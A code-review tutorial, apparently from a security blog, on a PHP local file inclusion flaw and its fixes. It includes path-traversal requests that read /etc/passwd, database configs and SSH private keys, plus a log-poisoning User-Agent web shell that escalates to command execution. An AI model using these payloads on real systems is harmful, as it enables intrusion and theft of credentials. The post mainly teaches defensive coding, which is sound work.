Code Review: Local File Inclusion via Unsanitized User Input

Most LFI vulnerabilities don’t come from complex logic. They come from a single line of code where a developer trusted user input they never should have.

This one is a classic — a PHP application that dynamically loads page templates based on a URL parameter. Clean, maintainable code on the surface. A complete disaster underneath.

The Code

<?php

function loadPage($page) {
    $basePath = '/var/www/html/pages/';
    $file = $basePath . $page;
    
    if (file_exists($file)) {
        include($file);
    } else {
        echo "Page not found.";
    }
}

$page = $_GET['page'];
loadPage($page);

?>

Read it carefully. The vulnerability is right there in plain sight.

Breaking It Down

The intent is simple — load a page template based on a URL parameter:

https://target.com/index.php?page=home.php
https://target.com/index.php?page=contact.php
https://target.com/index.php?page=about.php

The developer assumed users would only ever pass valid page names. They built the happy path and never considered what an attacker would send instead.

Here’s the flow:

$_GET['page'] takes the page parameter directly from the URL — no sanitization, no validation
It gets concatenated directly onto $basePath — no path normalization
file_exists() checks if the resulting path exists — any valid path on the filesystem passes this check
include() loads and executes the file — including files way outside the intended directory

The Vulnerability — Path Traversal + LFI

Because $page is never sanitized, an attacker can use ../ sequences to traverse up the directory tree and reach any file that the web server’s user account is allowed to read.

Attack 1 — Read /etc/passwd:

GET /index.php?page=../../../../etc/passwd

The resolved path becomes:

/var/www/html/pages/../../../../etc/passwd
→ /etc/passwd
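To make that resolution step concrete, here is a minimal sketch of how ../ segments collapse. The collapsePath() helper is hypothetical (it is not part of the vulnerable app) and works purely on strings, so it is safe to run anywhere; the real resolution is done by the operating system when PHP opens the file.

```php
<?php

// Hypothetical helper: collapses "." and ".." segments in an absolute,
// POSIX-style path using string operations only (no filesystem access).
function collapsePath(string $path): string
{
    $stack = [];
    foreach (explode('/', $path) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;           // skip empty and current-directory segments
        }
        if ($segment === '..') {
            array_pop($stack);  // go up one level; at the root this is a no-op
            continue;
        }
        $stack[] = $segment;
    }
    return '/' . implode('/', $stack);
}

$basePath = '/var/www/html/pages/';

echo collapsePath($basePath . 'home.php'), "\n";                // /var/www/html/pages/home.php
echo collapsePath($basePath . '../../../../etc/passwd'), "\n";  // /etc/passwd
echo collapsePath($basePath . '../config/database.php'), "\n";  // /var/www/html/config/database.php
```

Four ../ segments are exactly enough to climb from pages/ to the filesystem root, which is why the base path prefix offers no containment.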

file_exists() returns true. /etc/passwd contains no <?php tag, so include() executes nothing and writes the entire file straight into the response.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...

Attack 2 — Read application config with database credentials:

GET /index.php?page=../config/database.php

Resolved path:

/var/www/html/pages/../config/database.php
→ /var/www/html/config/database.php

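Whether the credentials actually leak depends on the file’s format. include() executes PHP instead of printing it, so a database.php that only assigns variables or returns an array runs silently and displays nothing. Config stored in a non-PHP format (.env, .ini, .yml) has no <?php tag, so it is echoed verbatim, and the attacker now has the database username, password, and host.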

Attack 3 — Read SSH private keys:

GET /index.php?page=../../../../home/deploy/.ssh/id_rsa

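If the web server user can read that file, the private key is exfiltrated. Game over. A key with the usual 0600 permissions is only readable by its owner, so this works on a misconfigured host, for example when the site runs as the deploy user.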

Why `file_exists()` Doesn’t Help

A common misconception is that checking file_exists() before including provides some protection. It doesn’t.

file_exists() returns true for any file that exists on the filesystem — not just files in the intended directory. It’s a filesystem check, not a security control. All it does here is avoid a PHP warning. An attacker only needs to target files that actually exist, which is trivially easy.
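A quick way to convince yourself is to try it in a throwaway directory. The sketch below is an illustration, not part of the reviewed app: the temp directory layout, the secret.txt file, and the existsUnderBase() helper are all made up for the demo.

```php
<?php

// Build a throwaway layout: <tmp>/pages/home.php plus <tmp>/secret.txt,
// where secret.txt sits OUTSIDE the pages/ directory.
$root = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/home.php', '<h1>Home</h1>');
file_put_contents($root . '/secret.txt', 'not meant to be served');

// Hypothetical helper mirroring the vulnerable check: concatenate, then ask
// the filesystem whether the result exists.
function existsUnderBase(string $basePath, string $page): bool
{
    return file_exists($basePath . $page);
}

$basePath = $root . '/pages/';
$results = [
    'home.php'      => existsUnderBase($basePath, 'home.php'),       // legitimate page
    '../secret.txt' => existsUnderBase($basePath, '../secret.txt'),  // outside pages/
    'missing.php'   => existsUnderBase($basePath, 'missing.php'),    // does not exist
];
var_dump($results);

// Clean up the demo files.
unlink($root . '/pages/home.php');
unlink($root . '/secret.txt');
rmdir($root . '/pages');
rmdir($root);
```

The traversal path passes the check just like the legitimate page does; only the genuinely missing file is rejected.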

Going Further — LFI to RCE

In certain conditions, LFI can be escalated to Remote Code Execution:

Log Poisoning: if the attacker can get text written into a log file (e.g. the Apache access log via a crafted User-Agent header), and the PHP process is able to read that log, then including it through the LFI executes any PHP code it contains:

GET /index.php HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>

Then:

GET /index.php?page=../../../../var/log/apache2/access.log&cmd=id

The PHP code embedded in the log executes and returns command output. LFI just became RCE.
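The mechanism behind this is that include() treats everything outside <?php ... ?> as plain output and everything inside as code, regardless of the file’s name or extension. Here is a harmless sketch of that behaviour. The log line is a simplified, made-up stand-in (not Apache’s exact log format), and the payload only uppercases a string.

```php
<?php

// Made-up, log-like line; the last quoted field plays the role of a
// User-Agent header carrying a harmless PHP payload.
$logLine = '203.0.113.7 "GET /index.php" "<?php echo strtoupper(\'executed\'); ?>"' . "\n";

// Write it to a temporary file that stands in for the access log.
$logFile = tempnam(sys_get_temp_dir(), 'log');
file_put_contents($logFile, $logLine);

// Capture what include() emits so it can be inspected.
ob_start();
include $logFile;
$output = ob_get_clean();
unlink($logFile);

// The plain text comes through untouched; the PHP tag is replaced by the
// result of running the code inside it.
echo $output;
```

Swap the harmless echo for system($_GET['cmd']) and you have the attack described above, which is why a readable, attacker-influenced log is enough to turn LFI into code execution.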

Root Cause

One line is responsible for everything:

$page = $_GET['page'];  // ← raw user input, zero validation

The developer made two assumptions that attackers invalidate immediately:

Users will only pass filenames, not directory traversal sequences
The base path prefix provides containment — it doesn’t

The Fix

Fix 1 — Whitelist allowed pages:

<?php

function loadPage($page) {
    // Define exactly which pages are allowed — nothing else
    $allowedPages = ['home', 'about', 'contact', 'services'];
    
    if (!in_array($page, $allowedPages, true)) {
        http_response_code(404);
        echo "Page not found.";
        return;
    }
    
    $basePath = '/var/www/html/pages/';
    $file = $basePath . $page . '.php';
    include($file);
}

$page = $_GET['page'] ?? 'home';
loadPage($page);

?>

Fix 2 — Resolve the real path and validate it stays within the base directory:

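<?php

function loadPage($page) {
    $basePath = realpath('/var/www/html/pages/');

    // If the base directory is missing, realpath() returns false and the
    // containment check below would be meaningless, so stop here
    if ($basePath === false) {
        http_response_code(404);
        echo "Page not found.";
        return;
    }

    $requestedPath = realpath($basePath . DIRECTORY_SEPARATOR . $page);

    // Ensure the resolved path sits under the base directory. The trailing
    // separator stops siblings like /var/www/html/pages_backup from matching
    $prefix = $basePath . DIRECTORY_SEPARATOR;
    if ($requestedPath === false || strpos($requestedPath, $prefix) !== 0) {
        http_response_code(403);
        echo "Access denied.";
        return;
    }

    include($requestedPath);
}

// Default includes the extension, since this version takes full filenames
$page = $_GET['page'] ?? 'home.php';
loadPage($page);

?>

realpath() resolves all ../ sequences (and symlinks) to the actual filesystem path, and returns false if the file doesn’t exist. The strpos() check then confirms the resolved path still lives inside the intended base directory. The trailing separator on the prefix matters: without it, a sibling directory such as /var/www/html/pages_backup would also pass the check. If the check fails, the request is denied.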
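One subtlety with any prefix check on resolved paths is the directory boundary. The sketch below compares a bare prefix match with one that requires a trailing separator. Both helper functions and the pages_backup directory are hypothetical, and the paths are plain strings, so nothing here touches the filesystem.

```php
<?php

// Naive containment check: a plain string-prefix match.
function isInsideNaive(string $base, string $resolved): bool
{
    return strpos($resolved, $base) === 0;
}

// Stricter check: the prefix must end at a directory boundary.
function isInsideStrict(string $base, string $resolved): bool
{
    $prefix = rtrim($base, '/') . '/';
    return strncmp($resolved, $prefix, strlen($prefix)) === 0;
}

$base    = '/var/www/html/pages';                 // realpath() returns no trailing slash
$inside  = '/var/www/html/pages/home.php';
$sibling = '/var/www/html/pages_backup/old.php';  // hypothetical sibling directory

var_dump(isInsideNaive($base, $inside));    // bool(true)
var_dump(isInsideNaive($base, $sibling));   // bool(true), a false positive
var_dump(isInsideStrict($base, $inside));   // bool(true)
var_dump(isInsideStrict($base, $sibling));  // bool(false)
```

A request like ?page=../pages_backup/old.php resolves to the sibling path, so the naive version would let it through. The strict version also rejects the base directory itself, which is fine here because a directory can’t be included anyway.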

Apply both fixes together. The whitelist prevents unknown filenames. The realpath() check prevents traversal even if the whitelist is somehow bypassed.
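As a rough sketch of what “both together” could look like, the function below layers the two checks and returns the path to include, or null to reject. The name resolvePage() and its parameters are my own choices for illustration; passing the allowlist and base directory in as arguments just makes it easy to exercise against a temporary directory.

```php
<?php

// Sketch combining both fixes. Returns the file to include, or null to reject.
function resolvePage(string $page, array $allowedPages, string $baseDir): ?string
{
    // Layer 1: exact-match allowlist of page names.
    if (!in_array($page, $allowedPages, true)) {
        return null;
    }

    // Layer 2: resolve the real path and confirm it stays inside the base.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $resolved = realpath($base . DIRECTORY_SEPARATOR . $page . '.php');
    $prefix   = $base . DIRECTORY_SEPARATOR;
    if ($resolved === false || strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $resolved;
}

// Demo against a throwaway directory containing a single page.
$baseDir = sys_get_temp_dir() . '/pages_demo_' . bin2hex(random_bytes(4));
mkdir($baseDir, 0700, true);
file_put_contents($baseDir . '/home.php', '<h1>Home</h1>');

$allowed = ['home', 'about'];
$checks = [
    'home'             => resolvePage('home', $allowed, $baseDir) !== null,             // allowed and present
    'about'            => resolvePage('about', $allowed, $baseDir) !== null,            // allowed but file missing
    '../../etc/passwd' => resolvePage('../../etc/passwd', $allowed, $baseDir) !== null, // not on the allowlist
];
var_dump($checks);

// Clean up the demo files.
unlink($baseDir . '/home.php');
rmdir($baseDir);
```

In a real handler you would call include only when the result is non-null, and check is_string($_GET['page']) first, since a request like ?page[]=x delivers an array rather than a string.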

Key Takeaways

Never pass user input directly to include(), require(), fopen(), or any filesystem function — always validate first
file_exists() is not a security control — it checks existence, not authorization
Whitelisting is always stronger than blacklisting — define what’s allowed, reject everything else
realpath() is your friend — it collapses traversal sequences before you validate the path
LFI is not just information disclosure — in the right conditions it escalates to full RCE via log poisoning or file upload chaining

Found this useful? More code reviews coming. Hit me up on X if you want to discuss.